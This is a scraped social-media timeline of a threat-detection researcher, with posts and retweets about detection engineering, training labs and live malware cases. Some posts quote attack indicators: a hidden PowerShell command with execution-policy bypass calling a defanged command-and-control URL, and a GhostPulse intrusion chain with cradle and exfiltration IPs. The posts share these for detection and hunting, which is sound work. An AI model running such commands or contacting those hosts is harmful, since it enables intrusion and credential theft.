KoifSec

115 posts

KoifSec

KoifSec

@KoifSec

Security research/detection, also writing for https://t.co/8C74RVZYox. Base64 Enjoyer. Clippy is a threat actor. BSKY https://t.co/JoPhPt9VcN

Katılım Aralık 2021
176 Takip Edilen127 Takipçiler
KoifSec
KoifSec@KoifSec·
@m45c07 Thank you brother, glad you enjoyed!
English
0
0
1
9
M45C07
M45C07@m45c07·
@KoifSec I am almost finished with this one, at the very first I was only confused due to the fact only questions were stated without answer to them, however as I progressed through the book and started thinking, the stuff clicked. Highly recommend this one for people in the field.
English
1
0
0
15
KoifSec retweetledi
MagicSword
MagicSword@magicswordio·
Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it. @HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub. The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog. Thanks @KoifSec for the contribution. 🫡 🔗 lolrmm.io/tools/komari 🧩 github.com/magicsword-io/… 📖 huntress.com/blog/komari-c2…
English
0
6
11
1.3K
KoifSec
KoifSec@KoifSec·
Published a new post right now on DetectFYI: "The Life-Dinner Principle in Detection", continuing from the latest post about arms race dynamics. Enjoy! detect.fyi/the-life-dinne…
English
0
0
0
10
Aura
Aura@SecurityAura·
C:\ProgramData\wt.exe All I have to say. This is a fucking meme at this point. IYKYK.
English
6
4
135
24.3K
KoifSec
KoifSec@KoifSec·
Found a TP today from the Axios incident. The observed command was: C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000 wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.
English
0
0
0
266
Kostas
Kostas@Kostastsale·
Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/introduci…
English
21
116
589
47K
KoifSec
KoifSec@KoifSec·
@Kostastsale I had the pleasure of beta testing this, highly recommended if this is something you're interested in. Everything Kostas does is worth looking into!
English
1
0
1
75
KoifSec
KoifSec@KoifSec·
New post out! "The Red Queen’s Race: Arms Race Dynamics in Threat Detection" @koifsec/the-red-queens-race-arms-race-dynamics-in-threat-detection-4f532a149fda" target="_blank" rel="nofollow noopener">medium.com/@koifsec/the-r…
English
0
0
0
23
KoifSec
KoifSec@KoifSec·
@itsJaimeMedina Great writeup! gonna start testing it out for myself 🙂
English
0
0
0
104
Jaime Medina
Jaime Medina@itsJaimeMedina·
Lots of talk about AI coding workflows. Not a lot of "here's exactly how I do it." I'm sharing my exact workflow for using 3 different ai agents (claude code, codex, gemini) build, challenge, and fix each other's work. Nothing fancy, just plain vanilla cli communication to ship features for @FileGrabLink , so lets break it down in this thread:
Jaime Medina tweet media
English
8
3
82
23.7K
KoifSec
KoifSec@KoifSec·
If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - deps.sh - completely usable from the CLI as well. Enjoy!
KoifSec tweet media
English
0
0
0
37
KoifSec
KoifSec@KoifSec·
@ThruntingLabs I was one of the lucky firsts - I HIGHLY recommend trying this out if you get the chance - this one is different.
English
0
0
0
25
KoifSec retweetledi
Threat Hunting Labs
Threat Hunting Labs@ThruntingLabs·
We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far!🙏 We will invite the second wave early next week! Thank you to everyone who is providing feedback!
English
2
2
12
1.5K
DFIR Diva
DFIR Diva@DfirDiva·
📣 I partnered with @13CubedDFIR for a Valentine's Day Giveaway! 🎁 🏆 1 Grand Prize winner will receive one course of their choice from the list below + a 13Cubed Investigator T-Shirt. Courses: - Investigating Windows Endpoints - Investigating Windows Memory - Investigating macOS Endpoints - Investigating Linux Devices Each course comes with a Certificate of Completion as well as Certification attempts. 👕 5 winners will receive 13Cubed Investigator T-Shirts. To Enter: ✅ Like ✅ Comment with the name of the course you want to win ✅ Repost On Valentine's Day (February 14th, 2026) entries from across three social media platforms will be combined and winners will be selected. For more info check out: 13Cubed Courses: training.13cubed.com Certification Information: training.13cubed.com/certifications T-Shirts: shop.13cubed.com #DFIR #DigitalForensics #IncidentResponse
DFIR Diva tweet media
English
169
158
255
19K
KoifSec
KoifSec@KoifSec·
Introducing the "Adversarial Detection Engineering (ADE) Framework" ! Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code. github.com/NikolasBielski… adeframework.org
KoifSec tweet media
English
0
9
30
1.6K
KoifSec retweetledi
Kostas
Kostas@Kostastsale·
I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques. Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: virustotal.com/gui/file/81f9a… PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging. PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading… explorer.exe └─ powershell.exe -nop -w hidden └─ msiexec.exe s1161271080.msi └─ S_Circuitr.exe └─ PlaneV128.exe (GhostPulse) ├─ chrome.exe --headless ├─ msedge.exe --headless └─ msiexec.exe sup.msi └─ superintendent.exe Signed executables using ZONER/Crisp IM certificates observed throughout the chain. Links: • joesandbox.com/analysis/18627…tria.ge/260205-ce1n5sd…bazaar.abuse.ch/sample/d63f35e… Hunt for PowerShell cradles paired with --headless browser launches. What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out. cc @malwrhunterteam
English
1
27
112
11.9K
KoifSec retweetledi
Aura
Aura@SecurityAura·
#GoreloRMM being pushed via a suspected email phishing campaign where the URL leads the user to a site with a "Download Proposal" button. This downloads a raw Gorelo installer. Same lure/tactic used as another campaign at the beginning of the month that pushed #ImmyBot. VT next
Aura tweet media
English
3
5
21
2.2K